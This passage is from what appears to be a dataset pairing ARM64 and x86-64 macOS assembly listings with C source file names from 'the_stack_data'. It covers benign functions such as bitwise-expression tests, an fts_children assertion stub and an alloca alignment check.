movl $2, %eax
cmpl -16(%rbp), %eax
setg %al
andb $1, %al
movzbl %al, %edi
cmpl $0, -8(%rbp)
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %eax
orl %eax, %edi
callq _foo
movl $2, %eax
cmpl -16(%rbp), %eax
sete %al
andb $1, %al
movzbl %al, %edi
cmpl $0, -8(%rbp)
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %eax
orl %eax, %edi
callq _foo
movl $2, %eax
cmpl -16(%rbp), %eax
setne %al
andb $1, %al
movzbl %al, %edi
cmpl $0, -8(%rbp)
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %eax
orl %eax, %edi
callq _foo
movl $2, %eax
cmpl -16(%rbp), %eax
setle %al
andb $1, %al
movzbl %al, %edi
cmpl $0, -8(%rbp)
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %eax
orl %eax, %edi
callq _foo
movl $2, %eax
cmpl -16(%rbp), %eax
setge %al
andb $1, %al
movzbl %al, %edi
cmpl $0, -8(%rbp)
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %eax
orl %eax, %edi
callq _foo
cmpl $0, -16(%rbp)
setne %al
andb $1, %al
movzbl %al, %edi
cmpl $0, -8(%rbp)
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %eax
orl %eax, %edi
callq _foo
cmpl $0, -8(%rbp)
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %edi
orl $1, %edi
callq _foo
cmpl $0, -8(%rbp)
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %edi
orl $0, %edi
callq _foo
movl -8(%rbp), %eax
orl $2, %eax
cmpl $0, %eax
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %edi
callq _foo
cmpl $0, -8(%rbp)
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %edi
orl $2, %edi
callq _foo
movl $2, %edi
callq _foo
movl $2, %eax
cmpl -16(%rbp), %eax
setl %al
andb $1, %al
movzbl %al, %edi
orl $0, %edi
callq _foo
movl $2, %eax
cmpl -16(%rbp), %eax
setg %al
andb $1, %al
movzbl %al, %edi
orl $0, %edi
callq _foo
movl $2, %eax
cmpl -16(%rbp), %eax
sete %al
andb $1, %al
movzbl %al, %edi
orl $0, %edi
callq _foo
movl $2, %eax
cmpl -16(%rbp), %eax
setne %al
andb $1, %al
movzbl %al, %edi
orl $0, %edi
callq _foo
movl $2, %eax
cmpl -16(%rbp), %eax
setle %al
andb $1, %al
movzbl %al, %edi
orl $0, %edi
callq _foo
movl $2, %eax
cmpl -16(%rbp), %eax
setge %al
andb $1, %al
movzbl %al, %edi
orl $0, %edi
callq _foo
cmpl $0, -16(%rbp)
setne %al
andb $1, %al
movzbl %al, %edi
orl $0, %edi
callq _foo
movl $1, %edi
callq _foo
xorl %edi, %edi
callq _foo
xorl %edi, %edi
callq _foo
movl $2, %edi
callq _foo
movl -4(%rbp), %eax
addq $64, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _baz ## -- Begin function baz
.p2align 4, 0x90
_baz: ## @baz
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $16, %rsp
movl %edi, -8(%rbp)
movl %esi, -12(%rbp)
movl %edx, -16(%rbp)
cmpl $0, -8(%rbp)
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %edi
movl -12(%rbp), %eax
movl -16(%rbp), %ecx
## kill: def $cl killed $ecx
shll %cl, %eax
andl %eax, %edi
callq _foo
cmpl $0, -8(%rbp)
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %edi
movl -12(%rbp), %eax
movl -16(%rbp), %ecx
## kill: def $cl killed $ecx
sarl %cl, %eax
andl %eax, %edi
callq _foo
cmpl $0, -8(%rbp)
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %edi
movl -12(%rbp), %eax
addl -16(%rbp), %eax
andl %eax, %edi
callq _foo
cmpl $0, -8(%rbp)
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %edi
movl -12(%rbp), %eax
subl -16(%rbp), %eax
andl %eax, %edi
callq _foo
cmpl $0, -8(%rbp)
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %edi
movl -16(%rbp), %eax
movl %eax, -12(%rbp)
andl %eax, %edi
callq _foo
cmpl $0, -8(%rbp)
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %edi
movl -12(%rbp), %eax
xorl $-1, %eax
andl %eax, %edi
callq _foo
cmpl $0, -8(%rbp)
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %edi
movl -12(%rbp), %eax
andl -16(%rbp), %eax
andl %eax, %edi
callq _foo
cmpl $0, -8(%rbp)
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %edi
movl -12(%rbp), %eax
orl -16(%rbp), %eax
andl %eax, %edi
callq _foo
cmpl $0, -8(%rbp)
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %edi
andl $2, %edi
callq _foo
cmpl $0, -8(%rbp)
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %edi
movl -16(%rbp), %ecx
movl $2, %eax
## kill: def $cl killed $ecx
shll %cl, %eax
andl %eax, %edi
callq _foo
cmpl $0, -8(%rbp)
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %edi
movl -16(%rbp), %ecx
movl $2, %eax
## kill: def $cl killed $ecx
sarl %cl, %eax
andl %eax, %edi
callq _foo
cmpl $0, -8(%rbp)
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %edi
movl -16(%rbp), %eax
addl $2, %eax
andl %eax, %edi
callq _foo
cmpl $0, -8(%rbp)
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %edi
movl $2, %eax
subl -16(%rbp), %eax
andl %eax, %edi
callq _foo
cmpl $0, -8(%rbp)
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %edi
movl $2, -16(%rbp)
andl $2, %edi
callq _foo
cmpl $0, -8(%rbp)
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %edi
andl $-3, %edi
callq _foo
cmpl $0, -8(%rbp)
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %edi
movl -16(%rbp), %eax
andl $2, %eax
andl %eax, %edi
callq _foo
cmpl $0, -8(%rbp)
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %edi
movl -16(%rbp), %eax
orl $2, %eax
andl %eax, %edi
callq _foo
movl -16(%rbp), %ecx
movl $2, %edi
## kill: def $cl killed $ecx
shll %cl, %edi
andl $0, %edi
callq _foo
movl -16(%rbp), %ecx
movl $2, %edi
## kill: def $cl killed $ecx
sarl %cl, %edi
andl $0, %edi
callq _foo
movl -16(%rbp), %edi
addl $2, %edi
andl $0, %edi
callq _foo
movl $2, %edi
subl -16(%rbp), %edi
andl $0, %edi
callq _foo
movl $2, -16(%rbp)
xorl %edi, %edi
callq _foo
xorl %edi, %edi
callq _foo
movl -16(%rbp), %edi
andl $2, %edi
andl $0, %edi
callq _foo
movl -16(%rbp), %edi
orl $2, %edi
andl $0, %edi
callq _foo
cmpl $0, -8(%rbp)
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %edi
movl -12(%rbp), %eax
movl -16(%rbp), %ecx
## kill: def $cl killed $ecx
shll %cl, %eax
orl %eax, %edi
callq _foo
cmpl $0, -8(%rbp)
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %edi
movl -12(%rbp), %eax
movl -16(%rbp), %ecx
## kill: def $cl killed $ecx
sarl %cl, %eax
orl %eax, %edi
callq _foo
cmpl $0, -8(%rbp)
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %edi
movl -12(%rbp), %eax
addl -16(%rbp), %eax
orl %eax, %edi
callq _foo
cmpl $0, -8(%rbp)
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %edi
movl -12(%rbp), %eax
subl -16(%rbp), %eax
orl %eax, %edi
callq _foo
cmpl $0, -8(%rbp)
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %edi
movl -16(%rbp), %eax
movl %eax, -12(%rbp)
orl %eax, %edi
callq _foo
cmpl $0, -8(%rbp)
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %edi
movl -12(%rbp), %eax
xorl $-1, %eax
orl %eax, %edi
callq _foo
cmpl $0, -8(%rbp)
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %edi
movl -12(%rbp), %eax
andl -16(%rbp), %eax
orl %eax, %edi
callq _foo
cmpl $0, -8(%rbp)
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %edi
movl -12(%rbp), %eax
orl -16(%rbp), %eax
orl %eax, %edi
callq _foo
cmpl $0, -8(%rbp)
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %edi
movl -16(%rbp), %ecx
movl $2, %eax
## kill: def $cl killed $ecx
shll %cl, %eax
orl %eax, %edi
callq _foo
cmpl $0, -8(%rbp)
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %edi
movl -16(%rbp), %ecx
movl $2, %eax
## kill: def $cl killed $ecx
sarl %cl, %eax
orl %eax, %edi
callq _foo
cmpl $0, -8(%rbp)
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %edi
movl -16(%rbp), %eax
addl $2, %eax
orl %eax, %edi
callq _foo
cmpl $0, -8(%rbp)
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %edi
movl $2, %eax
subl -16(%rbp), %eax
orl %eax, %edi
callq _foo
cmpl $0, -8(%rbp)
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %edi
movl $2, -16(%rbp)
orl $2, %edi
callq _foo
cmpl $0, -8(%rbp)
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %edi
orl $-3, %edi
callq _foo
cmpl $0, -8(%rbp)
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %edi
movl -16(%rbp), %eax
andl $2, %eax
orl %eax, %edi
callq _foo
cmpl $0, -8(%rbp)
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %edi
movl -16(%rbp), %eax
orl $2, %eax
orl %eax, %edi
callq _foo
movl -16(%rbp), %ecx
movl $2, %edi
## kill: def $cl killed $ecx
shll %cl, %edi
orl $0, %edi
callq _foo
movl -16(%rbp), %ecx
movl $2, %edi
## kill: def $cl killed $ecx
sarl %cl, %edi
orl $0, %edi
callq _foo
movl -16(%rbp), %edi
addl $2, %edi
orl $0, %edi
callq _foo
movl $2, %edi
subl -16(%rbp), %edi
orl $0, %edi
callq _foo
movl $2, -16(%rbp)
movl $2, %edi
callq _foo
movl $4294967293, %edi ## imm = 0xFFFFFFFD
callq _foo
movl -16(%rbp), %edi
andl $2, %edi
orl $0, %edi
callq _foo
movl -16(%rbp), %edi
orl $2, %edi
orl $0, %edi
callq _foo
movl -12(%rbp), %edi
movl -16(%rbp), %ecx
## kill: def $cl killed $ecx
shll %cl, %edi
cmpl $0, -8(%rbp)
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %eax
andl %eax, %edi
callq _foo
movl -12(%rbp), %edi
movl -16(%rbp), %ecx
## kill: def $cl killed $ecx
sarl %cl, %edi
cmpl $0, -8(%rbp)
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %eax
andl %eax, %edi
callq _foo
movl -12(%rbp), %edi
addl -16(%rbp), %edi
cmpl $0, -8(%rbp)
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %eax
andl %eax, %edi
callq _foo
movl -12(%rbp), %edi
subl -16(%rbp), %edi
cmpl $0, -8(%rbp)
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %eax
andl %eax, %edi
callq _foo
movl -16(%rbp), %edi
movl %edi, -12(%rbp)
cmpl $0, -8(%rbp)
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %eax
andl %eax, %edi
callq _foo
movl -12(%rbp), %edi
xorl $-1, %edi
cmpl $0, -8(%rbp)
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %eax
andl %eax, %edi
callq _foo
movl -12(%rbp), %edi
andl -16(%rbp), %edi
cmpl $0, -8(%rbp)
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %eax
andl %eax, %edi
callq _foo
movl -12(%rbp), %edi
orl -16(%rbp), %edi
cmpl $0, -8(%rbp)
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %eax
andl %eax, %edi
callq _foo
movl -16(%rbp), %ecx
movl $2, %edi
## kill: def $cl killed $ecx
shll %cl, %edi
cmpl $0, -8(%rbp)
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %eax
andl %eax, %edi
callq _foo
movl -16(%rbp), %ecx
movl $2, %edi
## kill: def $cl killed $ecx
sarl %cl, %edi
cmpl $0, -8(%rbp)
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %eax
andl %eax, %edi
callq _foo
movl -16(%rbp), %edi
addl $2, %edi
cmpl $0, -8(%rbp)
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %eax
andl %eax, %edi
callq _foo
movl $2, %edi
subl -16(%rbp), %edi
cmpl $0, -8(%rbp)
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %eax
andl %eax, %edi
callq _foo
movl $2, -16(%rbp)
cmpl $0, -8(%rbp)
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %edi
andl $2, %edi
callq _foo
cmpl $0, -8(%rbp)
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %edi
andl $4294967293, %edi ## imm = 0xFFFFFFFD
callq _foo
movl -16(%rbp), %edi
andl $2, %edi
cmpl $0, -8(%rbp)
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %eax
andl %eax, %edi
callq _foo
movl -16(%rbp), %edi
orl $2, %edi
cmpl $0, -8(%rbp)
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %eax
andl %eax, %edi
callq _foo
movl -16(%rbp), %ecx
movl $2, %edi
## kill: def $cl killed $ecx
shll %cl, %edi
andl $0, %edi
callq _foo
movl -16(%rbp), %ecx
movl $2, %edi
## kill: def $cl killed $ecx
sarl %cl, %edi
andl $0, %edi
callq _foo
movl -16(%rbp), %edi
addl $2, %edi
andl $0, %edi
callq _foo
movl $2, %edi
subl -16(%rbp), %edi
andl $0, %edi
callq _foo
movl $2, -16(%rbp)
xorl %edi, %edi
callq _foo
xorl %edi, %edi
callq _foo
movl -16(%rbp), %edi
andl $2, %edi
andl $0, %edi
callq _foo
movl -16(%rbp), %edi
orl $2, %edi
andl $0, %edi
callq _foo
movl -12(%rbp), %edi
movl -16(%rbp), %ecx
## kill: def $cl killed $ecx
shll %cl, %edi
cmpl $0, -8(%rbp)
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %eax
orl %eax, %edi
callq _foo
movl -12(%rbp), %edi
movl -16(%rbp), %ecx
## kill: def $cl killed $ecx
sarl %cl, %edi
cmpl $0, -8(%rbp)
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %eax
orl %eax, %edi
callq _foo
movl -12(%rbp), %edi
addl -16(%rbp), %edi
cmpl $0, -8(%rbp)
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %eax
orl %eax, %edi
callq _foo
movl -12(%rbp), %edi
subl -16(%rbp), %edi
cmpl $0, -8(%rbp)
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %eax
orl %eax, %edi
callq _foo
movl -16(%rbp), %edi
movl %edi, -12(%rbp)
cmpl $0, -8(%rbp)
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %eax
orl %eax, %edi
callq _foo
movl -12(%rbp), %edi
xorl $-1, %edi
cmpl $0, -8(%rbp)
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %eax
orl %eax, %edi
callq _foo
movl -12(%rbp), %edi
andl -16(%rbp), %edi
cmpl $0, -8(%rbp)
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %eax
orl %eax, %edi
callq _foo
movl -12(%rbp), %edi
orl -16(%rbp), %edi
cmpl $0, -8(%rbp)
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %eax
orl %eax, %edi
callq _foo
movl -16(%rbp), %ecx
movl $2, %edi
## kill: def $cl killed $ecx
shll %cl, %edi
cmpl $0, -8(%rbp)
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %eax
orl %eax, %edi
callq _foo
movl -16(%rbp), %ecx
movl $2, %edi
## kill: def $cl killed $ecx
sarl %cl, %edi
cmpl $0, -8(%rbp)
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %eax
orl %eax, %edi
callq _foo
movl -16(%rbp), %edi
addl $2, %edi
cmpl $0, -8(%rbp)
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %eax
orl %eax, %edi
callq _foo
movl $2, %edi
subl -16(%rbp), %edi
cmpl $0, -8(%rbp)
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %eax
orl %eax, %edi
callq _foo
movl $2, -16(%rbp)
cmpl $0, -8(%rbp)
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %edi
orl $2, %edi
callq _foo
cmpl $0, -8(%rbp)
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %edi
orl $4294967293, %edi ## imm = 0xFFFFFFFD
callq _foo
movl -16(%rbp), %edi
andl $2, %edi
cmpl $0, -8(%rbp)
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %eax
orl %eax, %edi
callq _foo
movl -16(%rbp), %edi
orl $2, %edi
cmpl $0, -8(%rbp)
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %eax
orl %eax, %edi
callq _foo
movl -16(%rbp), %ecx
movl $2, %edi
## kill: def $cl killed $ecx
shll %cl, %edi
orl $0, %edi
callq _foo
movl -16(%rbp), %ecx
movl $2, %edi
## kill: def $cl killed $ecx
sarl %cl, %edi
orl $0, %edi
callq _foo
movl -16(%rbp), %edi
addl $2, %edi
orl $0, %edi
callq _foo
movl $2, %edi
subl -16(%rbp), %edi
orl $0, %edi
callq _foo
movl $2, -16(%rbp)
movl $2, %edi
callq _foo
movl $4294967293, %edi ## imm = 0xFFFFFFFD
callq _foo
movl -16(%rbp), %edi
andl $2, %edi
orl $0, %edi
callq _foo
movl -16(%rbp), %edi
orl $2, %edi
orl $0, %edi
callq _foo
movl -4(%rbp), %eax
addq $16, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.subsections_via_symbols
| the_stack_data/144578.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _fts_children ; -- Begin function fts_children
.p2align 2
_fts_children: ; @fts_children
.cfi_startproc
; %bb.0:
sub sp, sp, #32
.cfi_def_cfa_offset 32
stp x29, x30, [sp, #16] ; 16-byte Folded Spill
add x29, sp, #16
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
str x0, [sp, #8]
str w1, [sp, #4]
adrp x0, l___func__.fts_children@PAGE
add x0, x0, l___func__.fts_children@PAGEOFF
adrp x1, l_.str@PAGE
add x1, x1, l_.str@PAGEOFF
mov w2, #12
adrp x3, l_.str.1@PAGE
add x3, x3, l_.str.1@PAGEOFF
bl ___assert_rtn
.cfi_endproc
; -- End function
.section __TEXT,__cstring,cstring_literals
l___func__.fts_children: ; @__func__.fts_children
.asciz "fts_children"
l_.str: ; @.str
.asciz "47336.c"
l_.str.1: ; @.str.1
.asciz "\"unhandled\" == NULL"
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _fts_children ## -- Begin function fts_children
.p2align 4, 0x90
_fts_children: ## @fts_children
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $16, %rsp
movq %rdi, -8(%rbp)
movl %esi, -12(%rbp)
leaq L___func__.fts_children(%rip), %rdi
leaq L_.str(%rip), %rsi
leaq L_.str.1(%rip), %rcx
movl $12, %edx
callq ___assert_rtn
.cfi_endproc
## -- End function
.section __TEXT,__cstring,cstring_literals
L___func__.fts_children: ## @__func__.fts_children
.asciz "fts_children"
L_.str: ## @.str
.asciz "47336.c"
L_.str.1: ## @.str.1
.asciz "\"unhandled\" == NULL"
.subsections_via_symbols
| the_stack_data/47336.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ; -- Begin function main
.p2align 2
_main: ; @main
.cfi_startproc
; %bb.0:
stp x29, x30, [sp, #-16]! ; 16-byte Folded Spill
.cfi_def_cfa_offset 16
mov x29, sp
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
sub sp, sp, #80
adrp x8, ___stack_chk_guard@GOTPAGE
ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF]
ldr x8, [x8]
stur x8, [x29, #-8]
stur wzr, [x29, #-12]
stur w0, [x29, #-16]
stur x1, [x29, #-24]
ldur w8, [x29, #-16]
subs w8, w8, #1
cset w9, ne
; implicit-def: $x8
mov x8, x9
ands x8, x8, #0x1
cset w8, eq
tbnz w8, #0, LBB0_2
b LBB0_1
LBB0_1:
adrp x0, l___func__.main@PAGE
add x0, x0, l___func__.main@PAGEOFF
adrp x1, l_.str@PAGE
add x1, x1, l_.str@PAGEOFF
mov w2, #14
adrp x3, l_.str.1@PAGE
add x3, x3, l_.str.1@PAGEOFF
bl ___assert_rtn
LBB0_2:
b LBB0_3
LBB0_3:
ldur w8, [x29, #-16]
mov w9, #4
stur w9, [x29, #-44] ; 4-byte Folded Spill
add w9, w8, #4
; implicit-def: $x8
mov x8, x9
sxtw x8, w8
lsr x8, x8, #0
add x8, x8, #15
and x9, x8, #0xfffffffffffffff0
stur x9, [x29, #-56] ; 8-byte Folded Spill
adrp x16, ___chkstk_darwin@GOTPAGE
ldr x16, [x16, ___chkstk_darwin@GOTPAGEOFF]
blr x16
ldur x9, [x29, #-56] ; 8-byte Folded Reload
ldur w10, [x29, #-44] ; 4-byte Folded Reload
mov x8, sp
subs x8, x8, x9
mov sp, x8
stur x8, [x29, #-32]
ldur x8, [x29, #-32]
; kill: def $w8 killed $w8 killed $x8
sdiv w9, w8, w10
mul w9, w9, w10
subs w8, w8, w9
subs w8, w8, #0
cset w9, ne
; implicit-def: $x8
mov x8, x9
ands x8, x8, #0x1
cset w8, eq
tbnz w8, #0, LBB0_5
b LBB0_4
LBB0_4:
adrp x0, l___func__.main@PAGE
add x0, x0, l___func__.main@PAGEOFF
adrp x1, l_.str@PAGE
add x1, x1, l_.str@PAGEOFF
mov w2, #16
adrp x3, l_.str.2@PAGE
add x3, x3, l_.str.2@PAGEOFF
bl ___assert_rtn
LBB0_5:
b LBB0_6
LBB0_6:
ldur w8, [x29, #-16]
mov w9, #4
stur w9, [x29, #-60] ; 4-byte Folded Spill
add w9, w8, #4
; implicit-def: $x8
mov x8, x9
sxtw x8, w8
lsr x8, x8, #0
add x8, x8, #15
and x9, x8, #0xfffffffffffffff0
stur x9, [x29, #-72] ; 8-byte Folded Spill
adrp x16, ___chkstk_darwin@GOTPAGE
ldr x16, [x16, ___chkstk_darwin@GOTPAGEOFF]
blr x16
ldur x9, [x29, #-72] ; 8-byte Folded Reload
ldur w10, [x29, #-60] ; 4-byte Folded Reload
mov x8, sp
subs x8, x8, x9
mov sp, x8
stur x8, [x29, #-40]
ldur x8, [x29, #-40]
; kill: def $w8 killed $w8 killed $x8
sdiv w9, w8, w10
mul w9, w9, w10
subs w8, w8, w9
subs w8, w8, #0
cset w9, ne
; implicit-def: $x8
mov x8, x9
ands x8, x8, #0x1
cset w8, eq
tbnz w8, #0, LBB0_8
b LBB0_7
LBB0_7:
adrp x0, l___func__.main@PAGE
add x0, x0, l___func__.main@PAGEOFF
adrp x1, l_.str@PAGE
add x1, x1, l_.str@PAGEOFF
mov w2, #18
adrp x3, l_.str.3@PAGE
add x3, x3, l_.str.3@PAGEOFF
bl ___assert_rtn
LBB0_8:
b LBB0_9
LBB0_9:
ldur x8, [x29, #-32]
; kill: def $w8 killed $w8 killed $x8
subs w8, w8, #0
cset w12, gt
ldur x8, [x29, #-32]
mov x11, x8
ldur x8, [x29, #-40]
mov x10, x8
sub sp, sp, #32
mov x9, sp
; implicit-def: $x8
mov x8, x12
and x8, x8, #0x1
str x8, [x9]
; implicit-def: $x8
mov x8, x11
str x8, [x9, #8]
; implicit-def: $x8
mov x8, x10
str x8, [x9, #16]
adrp x0, l_.str.4@PAGE
add x0, x0, l_.str.4@PAGEOFF
bl _printf
add sp, sp, #32
ldur x9, [x29, #-8]
adrp x8, ___stack_chk_guard@GOTPAGE
ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF]
ldr x8, [x8]
subs x8, x8, x9
cset w8, eq
tbnz w8, #0, LBB0_11
b LBB0_10
LBB0_10:
bl ___stack_chk_fail
LBB0_11:
mov w0, #0
mov sp, x29
ldp x29, x30, [sp], #16 ; 16-byte Folded Reload
ret
.cfi_endproc
; -- End function
.section __TEXT,__cstring,cstring_literals
l___func__.main: ; @__func__.main
.asciz "main"
l_.str: ; @.str
.asciz "154830991.c"
l_.str.1: ; @.str.1
.asciz "argc == 1"
l_.str.2: ; @.str.2
.asciz "((int)pc) % 4 == 0"
l_.str.3: ; @.str.3
.asciz "((int)pc2) % 4 == 0"
l_.str.4: ; @.str.4
.asciz "z:%d*%d*%d*\n"
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ## -- Begin function main
.p2align 4, 0x90
_main: ## @main
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $48, %rsp
movq ___stack_chk_guard@GOTPCREL(%rip), %rax
movq (%rax), %rax
movq %rax, -8(%rbp)
movl $0, -12(%rbp)
movl %edi, -16(%rbp)
movq %rsi, -24(%rbp)
cmpl $1, -16(%rbp)
sete %al
xorb $-1, %al
andb $1, %al
movzbl %al, %eax
cltq
cmpq $0, %rax
je LBB0_2
## %bb.1:
leaq L___func__.main(%rip), %rdi
leaq L_.str(%rip), %rsi
leaq L_.str.1(%rip), %rcx
movl $14, %edx
callq ___assert_rtn
LBB0_2:
jmp LBB0_3
LBB0_3:
movl -16(%rbp), %eax
addl $4, %eax
cltq
callq ____chkstk_darwin
addq $15, %rax
andq $-16, %rax
subq %rax, %rsp
movq %rsp, %rax
movq %rax, -32(%rbp)
movq -32(%rbp), %rax
## kill: def $eax killed $eax killed $rax
movl $4, %ecx
cltd
idivl %ecx
cmpl $0, %edx
sete %al
xorb $-1, %al
andb $1, %al
movzbl %al, %eax
cltq
cmpq $0, %rax
je LBB0_5
## %bb.4:
leaq L___func__.main(%rip), %rdi
leaq L_.str(%rip), %rsi
leaq L_.str.2(%rip), %rcx
movl $16, %edx
callq ___assert_rtn
LBB0_5:
jmp LBB0_6
LBB0_6:
movl -16(%rbp), %eax
addl $4, %eax
cltq
callq ____chkstk_darwin
addq $15, %rax
andq $-16, %rax
subq %rax, %rsp
movq %rsp, %rax
movq %rax, -40(%rbp)
movq -40(%rbp), %rax
## kill: def $eax killed $eax killed $rax
movl $4, %ecx
cltd
idivl %ecx
cmpl $0, %edx
sete %al
xorb $-1, %al
andb $1, %al
movzbl %al, %eax
cltq
cmpq $0, %rax
je LBB0_8
## %bb.7:
leaq L___func__.main(%rip), %rdi
leaq L_.str(%rip), %rsi
leaq L_.str.3(%rip), %rcx
movl $18, %edx
callq ___assert_rtn
LBB0_8:
jmp LBB0_9
LBB0_9:
movq -32(%rbp), %rax
## kill: def $eax killed $eax killed $rax
cmpl $0, %eax
setg %al
andb $1, %al
movzbl %al, %esi
movq -32(%rbp), %rax
movl %eax, %edx
movq -40(%rbp), %rax
movl %eax, %ecx
leaq L_.str.4(%rip), %rdi
movb $0, %al
callq _printf
movq ___stack_chk_guard@GOTPCREL(%rip), %rax
movq (%rax), %rax
movq -8(%rbp), %rcx
cmpq %rcx, %rax
jne LBB0_11
## %bb.10:
xorl %eax, %eax
movq %rbp, %rsp
popq %rbp
retq
LBB0_11:
callq ___stack_chk_fail
ud2
.cfi_endproc
## -- End function
.section __TEXT,__cstring,cstring_literals
L___func__.main: ## @__func__.main
.asciz "main"
L_.str: ## @.str
.asciz "154830991.c"
L_.str.1: ## @.str.1
.asciz "argc == 1"
L_.str.2: ## @.str.2
.asciz "((int)pc) % 4 == 0"
L_.str.3: ## @.str.3
.asciz "((int)pc2) % 4 == 0"
L_.str.4: ## @.str.4
.asciz "z:%d*%d*%d*\n"
.subsections_via_symbols
| the_stack_data/154830991.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.subsections_via_symbols
| the_stack_data/132953561.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _ft_get_light ; -- Begin function ft_get_light
.p2align 2
_ft_get_light: ; @ft_get_light
.cfi_startproc
; %bb.0:
sub sp, sp, #16
.cfi_def_cfa_offset 16
str w0, [sp, #12]
str w1, [sp, #8]
str d0, [sp]
ldr d1, [sp]
fmov d0, #1.00000000
fsub d0, d0, d1
ldr s2, [sp, #12]
; implicit-def: $d1
fmov s1, s2
sshll.2d v1, v1, #0
; kill: def $d1 killed $d1 killed $q1
scvtf d1, d1
ldr d2, [sp]
ldr s4, [sp, #8]
; implicit-def: $d3
